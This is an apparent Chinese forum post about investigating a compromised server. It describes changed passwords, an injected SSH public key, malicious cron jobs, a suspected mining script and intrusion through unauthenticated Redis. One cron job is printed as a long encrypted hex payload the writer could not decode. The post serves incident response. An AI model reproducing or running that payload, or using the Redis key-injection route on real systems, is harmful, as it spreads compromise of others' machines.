很奇怪啊本来客户是没有发现的服务器被入侵了的,但是在昨晚23点多,客户机子的四个账户同时被修改了密码,我不是很理解为什么要这样做,一下就露馅了啊。
具体细节:
客户自己处理的也很及时,立马就断网了,后续编写了iptables防火墙规则只允许已知的ip段连接,我接手后排查出被写入公钥,定时任务(有很多个要清理干净),其他未发现异常
定时任务:
其一(被加密过,解密失败)
8B0D4664580878563A2E3047711658634303FEFE17466458097C5633313058780A5D7A4118E8F71C466E5F0878463B2033467F165C605E1EFFE81F4162530E7947313222427E165E625E1AF4E81C4762530E794731362247790E47614303F4F61A5E63530E7947303022427E165B674603F7F1034760530E7947363722427E165B674603F7F0195E6350027F46333030567D0F4766431BE8F71B447A580B7A4C343033447B1858644303F7F5195E6C501678453B3A3446780B5C744803F4F7155E66590E6740303A3446780B50744803F7F5155E665F167847343A3446780C5074421DE8F00341665016714138363247780149604703F4F21F5E655C0D6741373A3446780A5074411FF6E819467A5C086747323538407909596C5019F5E81C436047097E422C323642730E5965441EE6F715417A5B097D58303333587E015362401CF5F40D487A5B0979583B342C44780D5362401CF2F30D4463470A7A4E2C313440670C506E461DF7F51A50605E1670412C313042670958664A1BF6F71D417458007B58333533587C0B47664114FCF01D416459187D432C313343670A5B605E1FF3F517466458087D5636372C447D0A476D4503F4F7184A6259097B4322313043670F5C7A411CF6E81F4166530E7947333522427E165B674603F1F1034265530E794733302247790E47614503F7F11C5E65590C73403231334169004766411AE8F418407A510A73403231364E69095B6D5E1CF2F203416C59167B4038363247790F49604703F4F51A5E6C5116784F313A344678095955FE2203D619CB26D9A2DB508221BF5752D3937A69
其二(远程下载了一个sh脚本,我判断是挖矿脚本)
远程域名是恶意还有在/tmp目录发现运行产生的恶意文件,重启后消失
最后判断是通过redis未授权写入的公钥,ssh密码是强密码不会被爆破。